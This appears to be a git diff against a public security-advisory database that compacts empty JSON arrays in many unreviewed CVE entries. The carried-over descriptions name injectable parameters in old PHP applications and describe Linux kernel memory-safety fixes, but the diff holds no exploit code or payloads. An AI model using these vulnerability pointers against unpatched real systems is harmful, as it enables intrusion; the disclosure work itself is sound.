"affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xgpp-xqc8-gr5w/GHSA-xgpp-xqc8-gr5w.json b/advisories/unreviewed/2022/05/GHSA-xgpp-xqc8-gr5w/GHSA-xgpp-xqc8-gr5w.json index 8dfe93ab236..12e2a15aaa6 100644 --- a/advisories/unreviewed/2022/05/GHSA-xgpp-xqc8-gr5w/GHSA-xgpp-xqc8-gr5w.json +++ b/advisories/unreviewed/2022/05/GHSA-xgpp-xqc8-gr5w/GHSA-xgpp-xqc8-gr5w.json @@ -7,12 +7,8 @@ "CVE-2012-1673" ], "details": "SQL injection vulnerability in loginscript.php in e-ticketing allows remote attackers to execute arbitrary SQL commands via the password parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xj6h-22hm-62qq/GHSA-xj6h-22hm-62qq.json b/advisories/unreviewed/2022/05/GHSA-xj6h-22hm-62qq/GHSA-xj6h-22hm-62qq.json index a80f3404b93..25f37b07b0f 100644 --- a/advisories/unreviewed/2022/05/GHSA-xj6h-22hm-62qq/GHSA-xj6h-22hm-62qq.json +++ b/advisories/unreviewed/2022/05/GHSA-xj6h-22hm-62qq/GHSA-xj6h-22hm-62qq.json @@ -7,12 +7,8 @@ "CVE-2012-2936" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in Pligg CMS before 1.2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) user or (2) page parameter to (a) admin/admin_comments.php or (b) admin/admin_links.php; or list parameter in a (3) move or (4) minimize action to (c) admin/admin_index.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xjwr-m2j3-wmrh/GHSA-xjwr-m2j3-wmrh.json b/advisories/unreviewed/2022/05/GHSA-xjwr-m2j3-wmrh/GHSA-xjwr-m2j3-wmrh.json index 4fafdc6a4ff..cbc5f170595 100644 --- a/advisories/unreviewed/2022/05/GHSA-xjwr-m2j3-wmrh/GHSA-xjwr-m2j3-wmrh.json +++ b/advisories/unreviewed/2022/05/GHSA-xjwr-m2j3-wmrh/GHSA-xjwr-m2j3-wmrh.json @@ -7,12 +7,8 @@ "CVE-2012-1778" ], "details": "SQL injection vulnerability in artykul_print.php in CreateVision CMS allows remote attackers to execute arbitrary SQL commands via the id parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xjxf-3hm4-x63c/GHSA-xjxf-3hm4-x63c.json b/advisories/unreviewed/2022/05/GHSA-xjxf-3hm4-x63c/GHSA-xjxf-3hm4-x63c.json index 78f95764cf8..3c95924b7c8 100644 --- a/advisories/unreviewed/2022/05/GHSA-xjxf-3hm4-x63c/GHSA-xjxf-3hm4-x63c.json +++ b/advisories/unreviewed/2022/05/GHSA-xjxf-3hm4-x63c/GHSA-xjxf-3hm4-x63c.json @@ -7,12 +7,8 @@ "CVE-2012-1018" ], "details": "Cross-site scripting (XSS) vulnerability in includes/convert.php in D-Mack Media Currency Converter (mod_currencyconverter) module 1.0.0 for Joomla! allows remote attackers to inject arbitrary web script or HTML via the from parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xpm3-hxcq-hjv4/GHSA-xpm3-hxcq-hjv4.json b/advisories/unreviewed/2022/05/GHSA-xpm3-hxcq-hjv4/GHSA-xpm3-hxcq-hjv4.json index f3a0d040c9f..a32eb0893c9 100644 --- a/advisories/unreviewed/2022/05/GHSA-xpm3-hxcq-hjv4/GHSA-xpm3-hxcq-hjv4.json +++ b/advisories/unreviewed/2022/05/GHSA-xpm3-hxcq-hjv4/GHSA-xpm3-hxcq-hjv4.json @@ -7,12 +7,8 @@ "CVE-2012-3115" ], "details": "Unspecified vulnerability in the Oracle MapViewer component in Oracle Fusion Middleware 10.1.3.1, 11.1.1.5, and 11.1.1.6 allows remote attackers to affect integrity via unknown vectors related to Install.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-xppp-92mj-4gg6/GHSA-xppp-92mj-4gg6.json b/advisories/unreviewed/2022/05/GHSA-xppp-92mj-4gg6/GHSA-xppp-92mj-4gg6.json index dfe7d54657d..f4377e04759 100644 --- a/advisories/unreviewed/2022/05/GHSA-xppp-92mj-4gg6/GHSA-xppp-92mj-4gg6.json +++ b/advisories/unreviewed/2022/05/GHSA-xppp-92mj-4gg6/GHSA-xppp-92mj-4gg6.json @@ -7,12 +7,8 @@ "CVE-2012-4054" ], "details": "Buffer overflow in the readfile function in CPE17 Autorun Killer 1.7.1 and earlier allows physically proximate attackers to execute arbitrary code via a crafted inf file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xqwr-x3rr-v7hv/GHSA-xqwr-x3rr-v7hv.json b/advisories/unreviewed/2022/05/GHSA-xqwr-x3rr-v7hv/GHSA-xqwr-x3rr-v7hv.json index 87efca89dd9..0d81c5fd8d9 100644 --- a/advisories/unreviewed/2022/05/GHSA-xqwr-x3rr-v7hv/GHSA-xqwr-x3rr-v7hv.json +++ b/advisories/unreviewed/2022/05/GHSA-xqwr-x3rr-v7hv/GHSA-xqwr-x3rr-v7hv.json @@ -7,12 +7,8 @@ "CVE-2012-1761" ], "details": "Unspecified vulnerability in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect integrity via unknown vectors related to UI Framework.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-xwfc-35wf-724m/GHSA-xwfc-35wf-724m.json b/advisories/unreviewed/2022/05/GHSA-xwfc-35wf-724m/GHSA-xwfc-35wf-724m.json index 7d1823adfa1..eb9417a437c 100644 --- a/advisories/unreviewed/2022/05/GHSA-xwfc-35wf-724m/GHSA-xwfc-35wf-724m.json +++ b/advisories/unreviewed/2022/05/GHSA-xwfc-35wf-724m/GHSA-xwfc-35wf-724m.json @@ -7,12 +7,8 @@ "CVE-2012-3301" ], "details": "Multiple CRLF injection vulnerabilities in the HTTP server in IBM Lotus Domino 8.5.x before 8.5.4 allow remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via crafted input involving (1) Mozilla Firefox 3.0.9 and earlier or (2) unspecified browsers.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xxg5-rxch-5cr5/GHSA-xxg5-rxch-5cr5.json b/advisories/unreviewed/2022/05/GHSA-xxg5-rxch-5cr5/GHSA-xxg5-rxch-5cr5.json index 21e5c52e533..ef44641dbe9 100644 --- a/advisories/unreviewed/2022/05/GHSA-xxg5-rxch-5cr5/GHSA-xxg5-rxch-5cr5.json +++ b/advisories/unreviewed/2022/05/GHSA-xxg5-rxch-5cr5/GHSA-xxg5-rxch-5cr5.json @@ -7,12 +7,8 @@ "CVE-2012-1732" ], "details": "Unspecified vulnerability in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect confidentiality via unknown vectors related to UI Framework, a different vulnerability than CVE-2012-1754.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/08/GHSA-2475-h6mj-prfm/GHSA-2475-h6mj-prfm.json b/advisories/unreviewed/2022/08/GHSA-2475-h6mj-prfm/GHSA-2475-h6mj-prfm.json index 94f2445eac9..6ae9f2aa77c 100644 --- a/advisories/unreviewed/2022/08/GHSA-2475-h6mj-prfm/GHSA-2475-h6mj-prfm.json +++ b/advisories/unreviewed/2022/08/GHSA-2475-h6mj-prfm/GHSA-2475-h6mj-prfm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-6jg8-m9ff-fv96/GHSA-6jg8-m9ff-fv96.json b/advisories/unreviewed/2022/09/GHSA-6jg8-m9ff-fv96/GHSA-6jg8-m9ff-fv96.json index 201a78ee237..5b867b1fd23 100644 --- a/advisories/unreviewed/2022/09/GHSA-6jg8-m9ff-fv96/GHSA-6jg8-m9ff-fv96.json +++ b/advisories/unreviewed/2022/09/GHSA-6jg8-m9ff-fv96/GHSA-6jg8-m9ff-fv96.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-9xh6-8fcg-f9qm/GHSA-9xh6-8fcg-f9qm.json b/advisories/unreviewed/2022/09/GHSA-9xh6-8fcg-f9qm/GHSA-9xh6-8fcg-f9qm.json index a0a07993bf0..300cc6c02cd 100644 --- a/advisories/unreviewed/2022/09/GHSA-9xh6-8fcg-f9qm/GHSA-9xh6-8fcg-f9qm.json +++ b/advisories/unreviewed/2022/09/GHSA-9xh6-8fcg-f9qm/GHSA-9xh6-8fcg-f9qm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/11/GHSA-8p7h-769g-x7mf/GHSA-8p7h-769g-x7mf.json b/advisories/unreviewed/2022/11/GHSA-8p7h-769g-x7mf/GHSA-8p7h-769g-x7mf.json index 984fa114437..a00ecedd8ea 100644 --- a/advisories/unreviewed/2022/11/GHSA-8p7h-769g-x7mf/GHSA-8p7h-769g-x7mf.json +++ b/advisories/unreviewed/2022/11/GHSA-8p7h-769g-x7mf/GHSA-8p7h-769g-x7mf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/04/GHSA-fxvw-v786-822p/GHSA-fxvw-v786-822p.json b/advisories/unreviewed/2023/04/GHSA-fxvw-v786-822p/GHSA-fxvw-v786-822p.json index d5359b89ce7..4fd468ab57c 100644 --- a/advisories/unreviewed/2023/04/GHSA-fxvw-v786-822p/GHSA-fxvw-v786-822p.json +++ b/advisories/unreviewed/2023/04/GHSA-fxvw-v786-822p/GHSA-fxvw-v786-822p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/04/GHSA-j5wg-h8jh-fx4v/GHSA-j5wg-h8jh-fx4v.json b/advisories/unreviewed/2023/04/GHSA-j5wg-h8jh-fx4v/GHSA-j5wg-h8jh-fx4v.json index 44b7c1d2c14..44a43667654 100644 --- a/advisories/unreviewed/2023/04/GHSA-j5wg-h8jh-fx4v/GHSA-j5wg-h8jh-fx4v.json +++ b/advisories/unreviewed/2023/04/GHSA-j5wg-h8jh-fx4v/GHSA-j5wg-h8jh-fx4v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/02/GHSA-2cxh-2c7w-4jcj/GHSA-2cxh-2c7w-4jcj.json b/advisories/unreviewed/2024/02/GHSA-2cxh-2c7w-4jcj/GHSA-2cxh-2c7w-4jcj.json index debaea8b203..32a1d9031d9 100644 --- a/advisories/unreviewed/2024/02/GHSA-2cxh-2c7w-4jcj/GHSA-2cxh-2c7w-4jcj.json +++ b/advisories/unreviewed/2024/02/GHSA-2cxh-2c7w-4jcj/GHSA-2cxh-2c7w-4jcj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/02/GHSA-65x6-qq63-m88g/GHSA-65x6-qq63-m88g.json b/advisories/unreviewed/2024/02/GHSA-65x6-qq63-m88g/GHSA-65x6-qq63-m88g.json index 030a37c69d5..2bf2397776d 100644 --- a/advisories/unreviewed/2024/02/GHSA-65x6-qq63-m88g/GHSA-65x6-qq63-m88g.json +++ b/advisories/unreviewed/2024/02/GHSA-65x6-qq63-m88g/GHSA-65x6-qq63-m88g.json @@ -7,12 +7,8 @@ "CVE-2021-47012" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/siw: Fix a use after free in siw_alloc_mr\n\nOur code analyzer reported a UAF.\n\nIn siw_alloc_mr(), it calls siw_mr_add_mem(mr,..). In the implementation of\nsiw_mr_add_mem(), mem is assigned to mr->mem and then mem is freed via\nkfree(mem) if xa_alloc_cyclic() failed. Here, mr->mem still point to a\nfreed object. After, the execution continue up to the err_out branch of\nsiw_alloc_mr, and the freed mr->mem is used in siw_mr_drop_mem(mr).\n\nMy patch moves \"mr->mem = mem\" behind the if (xa_alloc_cyclic(..)<0) {}\nsection, to avoid the uaf.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/02/GHSA-92wm-282g-vw3w/GHSA-92wm-282g-vw3w.json b/advisories/unreviewed/2024/02/GHSA-92wm-282g-vw3w/GHSA-92wm-282g-vw3w.json index 2d5dbeb4fd3..2c944836c41 100644 --- a/advisories/unreviewed/2024/02/GHSA-92wm-282g-vw3w/GHSA-92wm-282g-vw3w.json +++ b/advisories/unreviewed/2024/02/GHSA-92wm-282g-vw3w/GHSA-92wm-282g-vw3w.json @@ -7,12 +7,8 @@ "CVE-2021-47007" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nf2fs: fix panic during f2fs_resize_fs()\n\nf2fs_resize_fs() hangs in below callstack with testcase:\n- mkfs 16GB image & mount image\n- dd 8GB fileA\n- dd 8GB fileB\n- sync\n- rm fileA\n- sync\n- resize filesystem to 8GB\n\nkernel BUG at segment.c:2484!\nCall Trace:\n allocate_segment_by_default+0x92/0xf0 [f2fs]\n f2fs_allocate_data_block+0x44b/0x7e0 [f2fs]\n do_write_page+0x5a/0x110 [f2fs]\n f2fs_outplace_write_data+0x55/0x100 [f2fs]\n f2fs_do_write_data_page+0x392/0x850 [f2fs]\n move_data_page+0x233/0x320 [f2fs]\n do_garbage_collect+0x14d9/0x1660 [f2fs]\n free_segment_range+0x1f7/0x310 [f2fs]\n f2fs_resize_fs+0x118/0x330 [f2fs]\n __f2fs_ioctl+0x487/0x3680 [f2fs]\n __x64_sys_ioctl+0x8e/0xd0\n do_syscall_64+0x33/0x80\n entry_SYSCALL_64_after_hwframe+0x44/0xa9\n\nThe root cause is we forgot to check that whether we have enough space\nin resized filesystem to store all valid blocks in before-resizing\nfilesystem, then allocator will run out-of-space during block migration\nin free_segment_range().", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/02/GHSA-9pjj-2jvj-24rm/GHSA-9pjj-2jvj-24rm.json b/advisories/unreviewed/2024/02/GHSA-9pjj-2jvj-24rm/GHSA-9pjj-2jvj-24rm.json index f0145ac40a6..f2a641c10f2 100644 --- a/advisories/unreviewed/2024/02/GHSA-9pjj-2jvj-24rm/GHSA-9pjj-2jvj-24rm.json +++ b/advisories/unreviewed/2024/02/GHSA-9pjj-2jvj-24rm/GHSA-9pjj-2jvj-24rm.json @@ -7,12 +7,8 @@ "CVE-2021-47008" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: SVM: Make sure GHCB is mapped before updating\n\nAccess to the GHCB is mainly in the VMGEXIT path and it is known that the\nGHCB will be mapped. But there are two paths where it is possible the GHCB\nmight not be mapped.\n\nThe sev_vcpu_deliver_sipi_vector() routine will update the GHCB to inform\nthe caller of the AP Reset Hold NAE event that a SIPI has been delivered.\nHowever, if a SIPI is performed without a corresponding AP Reset Hold,\nthen the GHCB might not be mapped (depending on the previous VMEXIT),\nwhich will result in a NULL pointer dereference.\n\nThe svm_complete_emulated_msr() routine will update the GHCB to inform\nthe caller of a RDMSR/WRMSR operation about any errors. While it is likely\nthat the GHCB will be mapped in this situation, add a safe guard\nin this path to be certain a NULL pointer dereference is not encountered.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/02/GHSA-c4xm-6jcf-xfq6/GHSA-c4xm-6jcf-xfq6.json b/advisories/unreviewed/2024/02/GHSA-c4xm-6jcf-xfq6/GHSA-c4xm-6jcf-xfq6.json index 82f50ab7482..30b99876a00 100644 --- a/advisories/unreviewed/2024/02/GHSA-c4xm-6jcf-xfq6/GHSA-c4xm-6jcf-xfq6.json +++ b/advisories/unreviewed/2024/02/GHSA-c4xm-6jcf-xfq6/GHSA-c4xm-6jcf-xfq6.json @@ -7,12 +7,8 @@ "CVE-2021-46999" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nsctp: do asoc update earlier in sctp_sf_do_dupcook_a\n\nThere's a panic that occurs in a few of envs, the call trace is as below:\n\n [] general protection fault, ... 0x29acd70f1000a: 0000 [#1] SMP PTI\n [] RIP: 0010:sctp_ulpevent_notify_peer_addr_change+0x4b/0x1fa [sctp]\n [] sctp_assoc_control_transport+0x1b9/0x210 [sctp]\n [] sctp_do_8_2_transport_strike.isra.16+0x15c/0x220 [sctp]\n [] sctp_cmd_interpreter.isra.21+0x1231/0x1a10 [sctp]\n [] sctp_do_sm+0xc3/0x2a0 [sctp]\n [] sctp_generate_timeout_event+0x81/0xf0 [sctp]\n\nThis is caused by a transport use-after-free issue. When processing a\nduplicate COOKIE-ECHO chunk in sctp_sf_do_dupcook_a(), both COOKIE-ACK\nand SHUTDOWN chunks are allocated with the transort from the new asoc.\nHowever, later in the sideeffect machine, the old asoc is used to send\nthem out and old asoc's shutdown_last_sent_to is set to the transport\nthat SHUTDOWN chunk attached to in sctp_cmd_setup_t2(), which actually\nbelongs to the new asoc. After the new_asoc is freed and the old asoc\nT2 timeout, the old asoc's shutdown_last_sent_to that is already freed\nwould be accessed in sctp_sf_t2_timer_expire().\n\nThanks Alexander and Jere for helping dig into this issue.\n\nTo fix it, this patch is to do the asoc update first, then allocate\nthe COOKIE-ACK and SHUTDOWN chunks with the 'updated' old asoc. This\nwould make more sense, as a chunk from an asoc shouldn't be sent out\nwith another asoc. We had fixed quite a few issues caused by this.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/02/GHSA-fq4x-x6f2-9q95/GHSA-fq4x-x6f2-9q95.json b/advisories/unreviewed/2024/02/GHSA-fq4x-x6f2-9q95/GHSA-fq4x-x6f2-9q95.json index 34d179c3dbc..04b5f09b6f6 100644 --- a/advisories/unreviewed/2024/02/GHSA-fq4x-x6f2-9q95/GHSA-fq4x-x6f2-9q95.json +++ b/advisories/unreviewed/2024/02/GHSA-fq4x-x6f2-9q95/GHSA-fq4x-x6f2-9q95.json @@ -7,12 +7,8 @@ "CVE-2021-47009" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nKEYS: trusted: Fix memory leak on object td\n\nTwo error return paths are neglecting to free allocated object td,\ncausing a memory leak. Fix this by returning via the error return\npath that securely kfree's td.\n\nFixes clang scan-build warning:\nsecurity/keys/trusted-keys/trusted_tpm1.c:496:10: warning: Potential\nmemory leak [unix.Malloc]", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/02/GHSA-gpw4-cp4w-g7v7/GHSA-gpw4-cp4w-g7v7.json b/advisories/unreviewed/2024/02/GHSA-gpw4-cp4w-g7v7/GHSA-gpw4-cp4w-g7v7.json index be34da1afb8..42672e656a5 100644 --- a/advisories/unreviewed/2024/02/GHSA-gpw4-cp4w-g7v7/GHSA-gpw4-cp4w-g7v7.json +++ b/advisories/unreviewed/2024/02/GHSA-gpw4-cp4w-g7v7/GHSA-gpw4-cp4w-g7v7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/02/GHSA-jjvv-2q7q-vxj4/GHSA-jjvv-2q7q-vxj4.json b/advisories/unreviewed/2024/02/GHSA-jjvv-2q7q-vxj4/GHSA-jjvv-2q7q-vxj4.json index a5f69d31a19..34d9733bfab 100644 --- a/advisories/unreviewed/2024/02/GHSA-jjvv-2q7q-vxj4/GHSA-jjvv-2q7q-vxj4.json +++ b/advisories/unreviewed/2024/02/GHSA-jjvv-2q7q-vxj4/GHSA-jjvv-2q7q-vxj4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/02/GHSA-ph3h-5mmq-2rgv/GHSA-ph3h-5mmq-2rgv.json b/advisories/unreviewed/2024/02/GHSA-ph3h-5mmq-2rgv/GHSA-ph3h-5mmq-2rgv.json index f5aac98c345..7c03436eab0 100644 --- a/advisories/unreviewed/2024/02/GHSA-ph3h-5mmq-2rgv/GHSA-ph3h-5mmq-2rgv.json +++ b/advisories/unreviewed/2024/02/GHSA-ph3h-5mmq-2rgv/GHSA-ph3h-5mmq-2rgv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/02/GHSA-w6wm-9q8x-p5h7/GHSA-w6wm-9q8x-p5h7.json b/advisories/unreviewed/2024/02/GHSA-w6wm-9q8x-p5h7/GHSA-w6wm-9q8x-p5h7.json index ae28703401b..88fb45b9cc5 100644 --- a/advisories/unreviewed/2024/02/GHSA-w6wm-9q8x-p5h7/GHSA-w6wm-9q8x-p5h7.json +++ b/advisories/unreviewed/2024/02/GHSA-w6wm-9q8x-p5h7/GHSA-w6wm-9q8x-p5h7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/02/GHSA-xc3w-pcvf-rm7m/GHSA-xc3w-pcvf-rm7m.json b/advisories/unreviewed/2024/02/GHSA-xc3w-pcvf-rm7m/GHSA-xc3w-pcvf-rm7m.json index 827528c983f..3616a32fff5 100644 --- a/advisories/unreviewed/2024/02/GHSA-xc3w-pcvf-rm7m/GHSA-xc3w-pcvf-rm7m.json +++ b/advisories/unreviewed/2024/02/GHSA-xc3w-pcvf-rm7m/GHSA-xc3w-pcvf-rm7m.json @@ -7,12 +7,8 @@ "CVE-2021-47003" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: idxd: Fix potential null dereference on pointer status\n\nThere are calls to idxd_cmd_exec that pass a null status pointer however\na recent commit has added an assignment to *status that can end up\nwith a null pointer dereference. The function expects a null status\npointer sometimes as there is a later assignment to *status where\nstatus is first null checked. Fix the issue by null checking status\nbefore making the assignment.\n\nAddresses-Coverity: (\"Explicit null dereferenced\")", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/03/GHSA-27v4-w7r4-68vg/GHSA-27v4-w7r4-68vg.json b/advisories/unreviewed/2024/03/GHSA-27v4-w7r4-68vg/GHSA-27v4-w7r4-68vg.json index 848ffe857aa..d9b6132bdc0 100644 --- a/advisories/unreviewed/2024/03/GHSA-27v4-w7r4-68vg/GHSA-27v4-w7r4-68vg.json +++ b/advisories/unreviewed/2024/03/GHSA-27v4-w7r4-68vg/GHSA-27v4-w7r4-68vg.json @@ -7,12 +7,8 @@ "CVE-2023-40160" ], "details": "Directory traversal vulnerability exists in Mailing List Search CGI (pmmls.exe) included in A.K.I Software's PMailServer/PMailServer2 products. If this vulnerability is exploited, a remote attacker may obtain arbitrary files on the server.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/03/GHSA-2fx7-3mgv-p2gp/GHSA-2fx7-3mgv-p2gp.json b/advisories/unreviewed/2024/03/GHSA-2fx7-3mgv-p2gp/GHSA-2fx7-3mgv-p2gp.json index 4ad3bf3dc6a..45a9a460564 100644 --- a/advisories/unreviewed/2024/03/GHSA-2fx7-3mgv-p2gp/GHSA-2fx7-3mgv-p2gp.json +++ b/advisories/unreviewed/2024/03/GHSA-2fx7-3mgv-p2gp/GHSA-2fx7-3mgv-p2gp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-2wxc-99ff-4mwq/GHSA-2wxc-99ff-4mwq.json b/advisories/unreviewed/2024/03/GHSA-2wxc-99ff-4mwq/GHSA-2wxc-99ff-4mwq.json index 39dfbed8ef7..9e5651942f3 100644 --- a/advisories/unreviewed/2024/03/GHSA-2wxc-99ff-4mwq/GHSA-2wxc-99ff-4mwq.json +++ b/advisories/unreviewed/2024/03/GHSA-2wxc-99ff-4mwq/GHSA-2wxc-99ff-4mwq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-4649-c6ff-qp3w/GHSA-4649-c6ff-qp3w.json b/advisories/unreviewed/2024/03/GHSA-4649-c6ff-qp3w/GHSA-4649-c6ff-qp3w.json index f9bdb343fe5..681ad67981b 100644 --- a/advisories/unreviewed/2024/03/GHSA-4649-c6ff-qp3w/GHSA-4649-c6ff-qp3w.json +++ b/advisories/unreviewed/2024/03/GHSA-4649-c6ff-qp3w/GHSA-4649-c6ff-qp3w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ 